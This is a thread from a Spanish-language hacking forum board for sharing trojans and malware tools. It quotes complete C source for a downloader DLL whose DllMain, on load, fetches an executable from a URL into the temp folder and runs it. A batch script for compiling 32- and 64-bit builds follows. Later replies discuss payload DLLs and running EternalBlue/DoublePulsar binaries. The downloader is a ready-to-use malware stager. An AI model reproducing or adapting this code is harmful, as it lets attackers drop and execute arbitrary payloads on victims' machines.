• Troyanos y Herramientas

  • Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
 #491849  por SuC
 23 May 2017, 14:47
Te quedo de lujo Blau, todo un master!
 #491872  por David Saiz
 25 May 2017, 13:32
Blau escribió: 16 May 2017, 20:38 A petición de un compañero por el grupo de Skype, os dejo el código para un downloader DLL en C. Debéis instalar TDM-GCC (o cualquier compilador basado en MinGW).

Downloader.c
#include <windows.h>
BOOL __cdecl __declspec(dllexport) Download() {
	char* szUrl = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe";
	char* szPath = "aaaaa.exe";
	
	char *szTempPath = malloc(256);
	DWORD dwPathLength = GetTempPathA(256, szTempPath);
	
	strncat(szTempPath, szPath, dwPathLength);
	szTempPath[dwPathLength + strlen(szPath) + 1] = 0;

	HRESULT hRes = URLDownloadToFileA(NULL, szUrl, szTempPath, 0, NULL); 
	if(hRes == S_OK) {
		ShellExecuteA(NULL, "open", szTempPath, NULL, NULL, SW_SHOW);
	}
	
    return TRUE;
} 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if(fdwReason != DLL_PROCESS_ATTACH) return TRUE;
    return Download();
} 
Para compilar normalmente me hago un archivo .bat con esta estructura:
@ECHO OFF
SET InputFile=Downloader
SET Parameters=-w -Os -s -fpermissive -shared -lurlmon

del %InputFile%32.dll										
gcc %InputFile%.c %Parameters% -m32 -o %InputFile%32.dll	

del %InputFile%64.dll										
gcc %InputFile%.c %Parameters% -m64 -o %InputFile%64.dll
Hola, soy nuevo aquí y me gustaría ponerme en contacto contigo.
 #491935  por MatzHKR
 01 Jun 2017, 00:47
Blau eres un genio, un guru.
 #492256  por zabror
 26 Jul 2017, 22:32
thaaaaaaaaaaaaaanks
 #492570  por Blau
 01 Sep 2017, 01:06
Añadido código fuente en el post principal.
 #492572  por NyxKazuya
 01 Sep 2017, 07:20
Paylload DummyDLL64.dll
 #492574  por xxxPoseidonxxx
 02 Sep 2017, 00:12
Gracias por ejemplo. :drinking:
 #492576  por Sesenabo
 02 Sep 2017, 21:03
Muchisimas gracias crack :cool:
 #492905  por rafactumest123
 18 Oct 2017, 06:43
Lo ejecuto en Kali con MONO pero a la hora de dar en "start" me lanza un error que dice que no se encuentra el archivo doublepulsar ni eternalblue... ya revise el codigo fuente y hace la referencia correcta a la carpeta bin ... no encuentro el problema, alguien puede ayudarme???
 #492913  por Blau
 20 Oct 2017, 19:39
No lo he probado en Linux pero supongo que habria que modificar el código para correr los ejecutables bajo wine.
 #495619  por zika171213
 21 Mar 2020, 00:14
De casualidad alguien lo tendra que pueda pasarmelo, por favor? Gracias. 
 
 #495627  por lcno
 22 Mar 2020, 13:57
El código fuente esta en la primer pagina!